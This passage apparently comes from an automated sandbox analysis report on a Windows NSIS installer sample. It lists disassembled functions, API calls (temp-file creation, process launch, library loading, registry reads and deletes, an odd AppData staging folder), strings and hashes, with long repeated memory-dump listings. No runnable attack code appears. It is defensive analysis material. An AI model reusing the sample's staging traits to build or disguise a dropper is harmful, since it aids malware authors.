                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%S.dll$UXTHEME$\
                                  • API String ID: 2200240437-1946221925
                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                  • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                  • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 752 405ddf-405deb 753 405dec-405e20 GetTickCount GetTempFileNameW 752->753 754 405e22-405e24 753->754 755 405e2f-405e31 753->755 754->753 756 405e26 754->756 757 405e29-405e2c 755->757 756->757
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00405DFD
                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9), ref: 00405E18
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-2148918975
                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                  • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                  • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 758 404ade-404af5 759 404b02-404b0d 758->759 760 404af7-404b00 758->760 761 404b15-404b1b 759->761 762 404b0f-404b14 759->762 763 404b50-404ba4 call 4062dc * 3 lstrlenW wsprintfW SetDlgItemTextW 760->763 764 404b22-404b28 761->764 765 404b1d-404b21 761->765 762->761 767 404b37-404b4e 764->767 768 404b2a-404b35 764->768 765->764 767->763 768->767
                                  APIs
                                  • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                  • wsprintfW.USER32 ref: 00404B88
                                  • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 79233d9e080bb56a7a15bd4cd32d02ae1266adaabd055813affb11627f6ce0f6
                                  • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                  • Opcode Fuzzy Hash: 79233d9e080bb56a7a15bd4cd32d02ae1266adaabd055813affb11627f6ce0f6
                                  • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 774 4015c1-4015d5 call 402c41 call 405c3a 779 401631-401634 774->779 780 4015d7-4015ea call 405bbc 774->780 782 401663-402250 call 401423 779->782 783 401636-401655 call 401423 call 4062ba SetCurrentDirectoryW 779->783 789 401604-401607 call 40586e 780->789 790 4015ec-4015ef 780->790 797 402ac5-402ad4 782->797 798 40288b-402892 782->798 783->797 801 40165b-40165e 783->801 799 40160c-40160e 789->799 790->789 791 4015f1-4015f8 call 40588b 790->791 791->789 805 4015fa-401602 call 4057f1 791->805 798->797 802 401610-401615 799->802 803 401627-40162f 799->803 801->797 806 401624 802->806 807 401617-401622 GetFileAttributesW 802->807 803->779 803->780 805->799 806->803 807->803 807->806
                                  APIs
                                    • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405C48
                                    • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                    • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                    • Part of subcall function 004057F1: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,00000000,000000F0), ref: 0040164D
                                  Strings
                                  • C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 00401640
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges
                                  • API String ID: 1892508949-3897678559
                                  • Opcode ID: 8b115d712b5ab1ea208f506d05b2fe439a938a8f2237e224b529f97c3fde6e63
                                  • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                  • Opcode Fuzzy Hash: 8b115d712b5ab1ea208f506d05b2fe439a938a8f2237e224b529f97c3fde6e63
                                  • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 811 4058a3-4058d4 CreateProcessW 812 4058e2-4058e3 811->812 813 4058d6-4058df CloseHandle 811->813 813->812
                                  APIs
                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                  • CloseHandle.KERNEL32(?), ref: 004058D9
                                  Strings
                                  • Error launching installer, xrefs: 004058B6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                  • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                  • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                  • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D
                                    • Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                    • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                    • Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
                                    • Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                  • String ID:
                                  • API String ID: 334405425-0
                                  • Opcode ID: 666f6d8ac427e58388e3d879615a983e5b51d40526e42ae90acfa13b1993aa0d
                                  • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                  • Opcode Fuzzy Hash: 666f6d8ac427e58388e3d879615a983e5b51d40526e42ae90acfa13b1993aa0d
                                  • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                  APIs
                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                  • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,00000011,00000002), ref: 00402557
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID:
                                  • API String ID: 3356406503-0
                                  • Opcode ID: e43136bfdbb187cc7c3565e378a88e7f01443459ecd37d37261ab9bfe82c2c69
                                  • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                  • Opcode Fuzzy Hash: e43136bfdbb187cc7c3565e378a88e7f01443459ecd37d37261ab9bfe82c2c69
                                  • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                  APIs
                                    • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                    • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405C48
                                    • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                    • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                  • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405CF0
                                  • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420), ref: 00405D00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID:
                                  • API String ID: 3248276644-0
                                  • Opcode ID: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
                                  • Instruction ID: afdd3353ca4dad18281e5c0e52e07b41dda899da8cc80c7b0a0d0babdec36168
                                  • Opcode Fuzzy Hash: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
                                  • Instruction Fuzzy Hash: 87F0443100DF2225F622333A0C05AAF2554DE82328BAA053FFC52B12D2DA3C88138D7E
                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                  • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                  • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                  • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                  APIs
                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
